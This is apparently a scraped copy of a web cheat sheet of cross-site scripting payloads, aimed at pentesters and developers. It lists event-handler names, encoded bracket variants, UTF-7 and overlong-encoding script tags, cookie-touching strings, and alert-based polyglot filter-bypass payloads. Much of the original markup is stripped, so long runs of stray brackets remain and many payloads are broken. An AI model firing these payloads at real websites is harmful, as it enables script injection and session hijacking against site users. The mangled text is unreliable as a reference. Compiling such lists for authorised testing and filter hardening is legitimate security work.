Title: Ultimate Cross Site Scripting Attack Cheat Sheet Last Update: 2021-08-17 Note: This is a technical sheet for research about cross site scripting and script code injection attacks. Please continue the ultimate cross site scripting cheat sheet list or contribute to update. This cheat sheet list goes out to assist pentesters, developers, researchers & whitehats. Tags: onclick ondblclick onmousedown onmousemove onmouseover onmouseout onmouseup onkeydown onkeypress onkeyup onabort onerror onload onresize onscroll onunload onsubmit onblur onchange onfocus onreset onselect onMoveOn Features: script-unsafe-inline style-inline-allowed style-inline-blocked unsafe-eval external-scripts external-iframes controls-index-of-iframe controls-name controls-URL not-innerHTML chrome-only safari-only firefox-innerHTML chrome-innerHTML Brackets >" "> <" >< >"< .\>"%20<./ />%20< %20/%20> %20">%20< %3E%3C Pjw= / %0A %0C %0D < %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C XSS Strings:
exp/* ]] document.cookie=true'); ?> +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
& &{document.cookie=true;}; @mario_payload
< ;
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Restriction Bypass: >" >" >" >"
>"
>"
>"
>" >" >" >"exp/* >" >" >" >" >" >" >"]] >" >" >"document.cookie=true'); ?> >" +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- >" >"
>" >" >" >" >"& >"&{document.cookie=true;}; >" >" >" >" >" >" >"
>"
>"
>"
>" >" >" >"< >" >" >" >" >" >"; >"
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> "> "autofocus onfocus=alert(1)// '-alert(1)-' \'-alert(1)// javascript:alert(1) Others: Random ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> '';!--"=&{()} "> perl -e 'print "";' > out perl -e 'print "alert(\"XSS\")";' > out < \";alert('XSS');//